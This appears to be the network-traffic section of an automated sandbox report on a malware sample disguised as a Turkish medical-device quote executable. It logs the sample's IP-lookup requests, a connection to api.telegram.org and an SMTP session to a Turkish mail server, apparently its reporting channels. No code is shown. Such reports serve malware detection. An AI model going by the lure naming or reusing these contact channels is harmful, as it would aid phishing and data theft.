                                                                                                  Dec 10, 2024 16:24:23.229441881 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:23.229654074 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:23.349257946 CET8049756193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:24.365780115 CET8049756193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:24.368092060 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:24.368130922 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:24.368232965 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:24.368525028 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:24.368536949 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:24.406930923 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:25.581996918 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:25.583945990 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:25.583971024 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:26.029354095 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:26.029424906 CET44349757172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:26.029563904 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:26.030350924 CET49757443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:26.034300089 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:26.035439014 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:26.154781103 CET8049756193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:26.154839993 CET4975680192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:26.155040026 CET8049764193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:26.155131102 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:26.155335903 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:26.274593115 CET8049764193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:27.269160032 CET8049764193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:27.270765066 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:27.270781040 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:27.270904064 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:27.271188021 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:27.271199942 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:27.313190937 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:28.662210941 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:28.664212942 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:28.664249897 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:29.118110895 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:29.118186951 CET44349770172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:29.118293047 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:29.118834019 CET49770443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:29.122808933 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:29.124238014 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:29.242729902 CET8049764193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:29.242873907 CET4976480192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:29.244499922 CET8049771193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:29.244609118 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:29.244760990 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:29.363977909 CET8049771193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:30.340729952 CET8049771193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:30.342133999 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:30.342192888 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:30.342263937 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:30.342585087 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:30.342601061 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:30.391330957 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:31.556799889 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:31.558742046 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:31.558769941 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:32.022279024 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:32.022341013 CET44349777172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:32.022392035 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:32.022917986 CET49777443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:32.026746988 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:32.028031111 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:32.148087025 CET8049771193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:32.148190022 CET4977180192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:32.148840904 CET8049783193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:32.148922920 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:32.149127960 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:32.268405914 CET8049783193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:33.244954109 CET8049783193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:33.246392012 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:33.246433020 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:33.246511936 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:33.246893883 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:33.246905088 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:33.297523975 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:34.459374905 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:34.463815928 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:34.463839054 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:34.911210060 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:34.911277056 CET44349784172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:34.911406040 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:34.911948919 CET49784443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:34.915781975 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:34.917073011 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:35.035523891 CET8049783193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:35.035624027 CET4978380192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:35.036633968 CET8049790193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:35.036729097 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:35.036919117 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:35.156306028 CET8049790193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:36.133208990 CET8049790193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:36.134749889 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:36.134776115 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:36.134848118 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:36.135185957 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:36.135199070 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:36.188255072 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:37.346682072 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.348498106 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:37.348535061 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.801048994 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.801111937 CET44349795172.67.177.134192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.801497936 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:37.801839113 CET49795443192.168.2.6172.67.177.134
                                                                                                  Dec 10, 2024 16:24:37.816024065 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:37.935936928 CET8049790193.122.130.0192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.936095953 CET4979080192.168.2.6193.122.130.0
                                                                                                  Dec 10, 2024 16:24:37.961045027 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:37.961091995 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.961177111 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:37.961709023 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:37.961720943 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.333764076 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.333909035 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:39.335968018 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:39.335975885 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.336222887 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.337654114 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:39.379328966 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.840003014 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.840081930 CET44349797149.154.167.220192.168.2.6
                                                                                                  Dec 10, 2024 16:24:39.840136051 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:39.844180107 CET49797443192.168.2.6149.154.167.220
                                                                                                  Dec 10, 2024 16:24:47.145071983 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:47.264389992 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:47.264581919 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:48.863353014 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:48.863569975 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:48.982974052 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:49.309055090 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:49.310322046 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:49.429560900 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:49.751543999 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:49.751939058 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:49.871747017 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:50.291631937 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:50.292012930 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:50.413835049 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:50.732841969 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:50.734371901 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:50.854348898 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:51.186331987 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:51.190140009 CET49822587192.168.2.677.245.159.14
                                                                                                  Dec 10, 2024 16:24:51.309845924 CET5874982277.245.159.14192.168.2.6
                                                                                                  Dec 10, 2024 16:24:51.309931040 CET49822587192.168.2.677.245.159.14

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 10, 2024 16:24:11.051363945 CET5653853192.168.2.61.1.1.1
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET53565381.1.1.1192.168.2.6
                                                                                                  Dec 10, 2024 16:24:13.325362921 CET5512353192.168.2.61.1.1.1
                                                                                                  Dec 10, 2024 16:24:13.464237928 CET53551231.1.1.1192.168.2.6
                                                                                                  Dec 10, 2024 16:24:37.816785097 CET5622453192.168.2.61.1.1.1
                                                                                                  Dec 10, 2024 16:24:37.959417105 CET53562241.1.1.1192.168.2.6
                                                                                                  Dec 10, 2024 16:24:46.296924114 CET5028353192.168.2.61.1.1.1
                                                                                                  Dec 10, 2024 16:24:47.143644094 CET53502831.1.1.1192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 10, 2024 16:24:11.051363945 CET192.168.2.61.1.1.10x20bbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:13.325362921 CET192.168.2.61.1.1.10xa88cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:37.816785097 CET192.168.2.61.1.1.10x61efStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:46.296924114 CET192.168.2.61.1.1.10xc710Standard query (0)mail.adendanismanlik.com.trA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:11.190730095 CET1.1.1.1192.168.2.60x20bbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:13.464237928 CET1.1.1.1192.168.2.60xa88cNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:13.464237928 CET1.1.1.1192.168.2.60xa88cNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:37.959417105 CET1.1.1.1192.168.2.60x61efNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:47.143644094 CET1.1.1.1192.168.2.60xc710No error (0)mail.adendanismanlik.com.tradendanismanlik.com.trCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 10, 2024 16:24:47.143644094 CET1.1.1.1192.168.2.60xc710No error (0)adendanismanlik.com.tr77.245.159.14A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • reallyfreegeoip.org
                                                                                                  • api.telegram.org
                                                                                                  • checkip.dyndns.org

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649711193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:11.323293924 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:12.732255936 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:12 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: c1dadd95a7ab044c36bb688497549d17
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                  Dec 10, 2024 16:24:12.749000072 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Dec 10, 2024 16:24:13.287237883 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:13 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: b3dada2bebd1470753e20c18588157f0
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                  Dec 10, 2024 16:24:15.160124063 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Dec 10, 2024 16:24:15.489801884 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:15 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: b0f4ea4a8ad37d4cb85bf330a8617574
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649735193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:17.282748938 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Dec 10, 2024 16:24:18.378488064 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:18 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: d8eaaf862c15d94985471c9f09a477ff
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.649744193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:20.187365055 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:21.433022022 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:21 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 6f16011542b26537ee21e79fc8f2aaf9
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.649756193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:23.229654074 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:24.365780115 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:24 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: bd1a9812340fafc9214540bcf8927388
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.649764193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:26.155335903 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:27.269160032 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:27 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: ec9c8ec0eb3283d98e47e0a6712ee9c3
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.649771193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:29.244760990 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:30.340729952 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:30 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: da2fa24400fe2f60d8c7b4dbbeb8583e
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
